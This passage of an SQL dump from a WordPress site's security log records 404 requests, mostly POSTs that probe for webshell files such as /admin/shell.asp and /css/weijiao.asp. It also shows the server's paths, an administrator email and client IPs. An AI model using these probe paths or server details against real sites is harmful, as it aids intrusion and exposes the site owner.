Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.17.106.13\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.17.106.13\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/shell.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/shell.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2WNG1ncq3cUuJao9IfggAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/admin/shell.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"54869\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/shell.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/shell.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2WNG1ncq3cUuJao9IfggAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571657269.548\";s:12:\"REQUEST_TIME\";s:10:\"1571657269\";}}','notice','2019-10-21 11:28:08','2019-10-21 11:27:50',35670360,37477912,'http://bintara.com.my//admin/shell.asp',1,0,'58.17.106.13'),(28604,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//css/weijiao.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"824\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"59.174.100.172\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"59.174.100.172\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/css/weijiao.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/css/weijiao.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2WTsUiXNL058AVCLuFGQAAAck\";s:12:\"REDIRECT_URL\";s:16:\"/css/weijiao.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"55509\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/css/weijiao.asp\";s:10:\"SCRIPT_URL\";s:16:\"/css/weijiao.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2WTsUiXNL058AVCLuFGQAAAck\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657297.2426\";s:12:\"REQUEST_TIME\";s:10:\"1571657297\";}}','notice','2019-10-21 11:28:26','2019-10-21 11:28:19',35336392,37137592,'http://bintara.com.my//css/weijiao.asp',1,0,'59.174.100.172'),(28605,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//company/swq2l.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"119.114.47.38\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"119.114.47.38\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/company/swq2l.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/company/swq2l.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2WXaAwEvHJaKWJ1hYi5wAAAAo\";s:12:\"REDIRECT_URL\";s:18:\"/company/swq2l.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"55880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/company/swq2l.asp\";s:10:\"SCRIPT_URL\";s:18:\"/company/swq2l.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2WXaAwEvHJaKWJ1hYi5wAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657311.5223\";s:12:\"REQUEST_TIME\";s:10:\"1571657311\";}}','notice','2019-10-21 11:28:35','2019-10-21 11:28:31',35340088,37141400,'http://bintara.com.my//company/swq2l.asp',1,0,'119.114.47.38'),(28606,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//company/swq2l.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.12.134.79\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.12.134.79\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/company/swq2l.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/company/swq2l.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2WZMUiXNL058AVCLuFGwAAAdE\";s:12:\"REDIRECT_URL\";s:18:\"/company/swq2l.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"56031\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/company/swq2l.asp\";s:10:\"SCRIPT_URL\";s:18:\"/company/swq2l.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2WZMUiXNL058AVCLuFGwAAAdE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571657318.584\";s:12:\"REQUEST_TIME\";s:10:\"1571657318\";}}','notice','2019-10-21 11:28:51','2019-10-21 11:28:39',35270640,37074752,'http://bintara.com.my//company/swq2l.asp',1,0,'210.12.134.79'),(28607,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.194.168.114\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.194.168.114\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Wmm1ncq3cUuJao9IgDgAAAIY\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63276\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Wmm1ncq3cUuJao9IgDgAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657374.8085\";s:12:\"REQUEST_TIME\";s:10:\"1571657374\";}}','notice','2019-10-21 11:29:39','2019-10-21 11:29:35',35343848,37155128,'http://bintara.com.my//inc/config.asp',1,0,'218.194.168.114'),(28608,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571656526.5666899681091308593750\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571656526.5666899681091308593750\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571656526.5666899681091308593750\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571656526.5666899681091308593750\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"52972\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571656526.5666899681091308593750\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2TTqAwEvHJaKWJ1hYhdQAAABc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2TTqAwEvHJaKWJ1hYhdQAAABc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"52972\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa2TTqAwEvHJaKWJ1hYhdQAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657434.3932\";s:12:\"REQUEST_TIME\";s:10:\"1571657434\";}}','notice','2019-10-21 11:30:42','2019-10-21 11:30:37',35000720,35254392,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571656526.5666899681091308593750',1,0,'103.6.198.69'),(28609,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5DC7220B-6CA0-4A89-ADA0-5D069C740ABC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2XGqjZzpoQqaKQA3IeoAAAAM4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"118.101.92.88\";s:11:\"REMOTE_PORT\";s:5:\"64880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa2XGqjZzpoQqaKQA3IeoAAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657499.3565\";s:12:\"REQUEST_TIME\";s:10:\"1571657499\";}}','notice','2019-10-21 11:31:56','2019-10-21 11:31:43',35667968,37466040,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'118.101.92.88'),(28610,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/website/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/website/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2dSm1ncq3cUuJao9IoCQAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/website/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2dSm1ncq3cUuJao9IoCQAAAJA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"64.140.200.40\";s:11:\"REMOTE_PORT\";s:5:\"54212\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:10:\"SCRIPT_URL\";s:9:\"/website/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.6